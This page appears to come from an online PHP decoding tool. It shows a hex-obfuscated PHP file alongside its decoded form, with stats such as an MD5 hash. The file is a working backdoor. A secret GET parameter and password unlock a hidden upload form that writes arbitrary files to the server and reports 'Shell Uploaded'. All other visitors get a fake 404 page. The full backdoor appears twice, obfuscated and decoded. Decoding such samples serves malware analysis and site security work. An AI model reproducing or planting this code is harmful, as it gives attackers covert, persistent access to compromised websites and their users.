Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto xpp1_; xyhbr: die; goto VMruj; zqyi4: require $_SERVER["\104\117\103\x55\x4d\..
Decoded Output download
<?php
goto xpp1_; xyhbr: die; goto VMruj; zqyi4: require $_SERVER["DOCUMENT_ROOT"] . "/paginationErrorDocument404.php"; goto xyhbr; xpp1_: if (isset($_GET["protecaoselecaoe7novaEra"])) { if ($_GET["protecaoselecaoe7novaEra"] == "9824@8c7f7@a8fsca0fc@08a9s08f@89a72c78921@7481@") { echo "<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; if (isset($_POST["_upl"])) { if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Shell Uploaded ! :)<b><br><br>"; } else { echo "<b>Not uploaded ! </b><br><br>"; } } } die; } } else { require $_SERVER["DOCUMENT_ROOT"] . "/paginationErrorDocument404.php"; die; } goto zqyi4; VMruj: ?>
Did this file decode correctly?
Original Code
<?php
goto xpp1_; xyhbr: die; goto VMruj; zqyi4: require $_SERVER["\104\117\103\x55\x4d\x45\116\124\137\x52\x4f\117\x54"] . "\x2f\x70\x61\x67\x69\x6e\x61\164\x69\x6f\156\x45\x72\162\157\162\104\157\143\165\x6d\x65\156\164\64\x30\x34\56\x70\x68\x70"; goto xyhbr; xpp1_: if (isset($_GET["\x70\x72\x6f\x74\x65\x63\141\x6f\163\x65\x6c\x65\x63\141\157\145\x37\156\157\x76\x61\x45\162\x61"])) { if ($_GET["\160\162\x6f\x74\x65\143\x61\157\x73\x65\154\x65\143\141\x6f\145\67\x6e\157\166\141\105\x72\141"] == "\x39\x38\x32\x34\x40\70\x63\x37\x66\x37\x40\x61\x38\x66\x73\143\x61\x30\146\143\x40\60\70\141\71\163\60\x38\146\x40\70\71\x61\x37\x32\143\x37\x38\71\x32\x31\100\67\64\70\61\100") { echo "\x3c\146\157\x72\155\x20\141\143\164\151\x6f\x6e\75\42\x22\x20\155\x65\164\x68\x6f\144\75\x22\160\157\163\164\42\x20\x65\x6e\x63\164\x79\x70\145\x3d\x22\155\165\x6c\164\151\160\141\x72\x74\x2f\146\157\162\x6d\55\144\141\164\141\x22\40\156\141\x6d\145\75\42\x75\x70\x6c\x6f\x61\x64\145\162\42\x20\x69\x64\75\42\165\x70\x6c\x6f\x61\x64\x65\162\x22\76"; echo "\74\x69\x6e\x70\165\164\40\164\171\160\145\x3d\x22\x66\x69\x6c\x65\x22\40\x6e\141\x6d\x65\75\42\x66\151\154\x65\42\x20\x73\x69\172\145\75\x22\65\x30\x22\x3e\x3c\x69\x6e\160\x75\x74\40\x6e\x61\x6d\x65\75\x22\x5f\x75\160\154\x22\40\x74\171\160\x65\75\x22\163\x75\x62\155\x69\x74\x22\x20\151\x64\x3d\42\x5f\165\160\x6c\42\x20\x76\x61\154\x75\x65\x3d\x22\x55\160\154\x6f\x61\144\42\76\74\x2f\146\x6f\162\155\76"; if (isset($_POST["\137\165\x70\154"])) { if ($_POST["\137\165\160\x6c"] == "\x55\x70\154\x6f\141\x64") { if (@copy($_FILES["\146\151\154\145"]["\x74\155\x70\137\156\141\155\x65"], $_FILES["\146\x69\x6c\x65"]["\x6e\x61\155\x65"])) { echo "\74\x62\76\123\150\145\154\154\40\x55\160\x6c\x6f\141\144\145\x64\x20\41\40\72\x29\74\142\76\x3c\142\162\x3e\x3c\x62\162\76"; } else { echo "\74\x62\x3e\116\157\164\40\x75\x70\x6c\x6f\x61\x64\145\144\x20\x21\x20\x3c\x2f\x62\x3e\x3c\142\x72\76\x3c\142\162\x3e"; } } } die; } } else { require $_SERVER["\104\117\x43\x55\115\x45\116\x54\137\x52\117\117\124"] . "\x2f\x70\x61\147\151\x6e\141\x74\x69\157\156\105\x72\162\x6f\162\x44\157\143\x75\x6d\x65\x6e\x74\x34\60\x34\56\160\x68\x70"; die; } goto zqyi4; VMruj: ?>
Function Calls
None |
Stats
MD5 | 29f784bf0f12a6b84d8d0430ddee706d |
Eval Count | 0 |
Decode Time | 56 ms |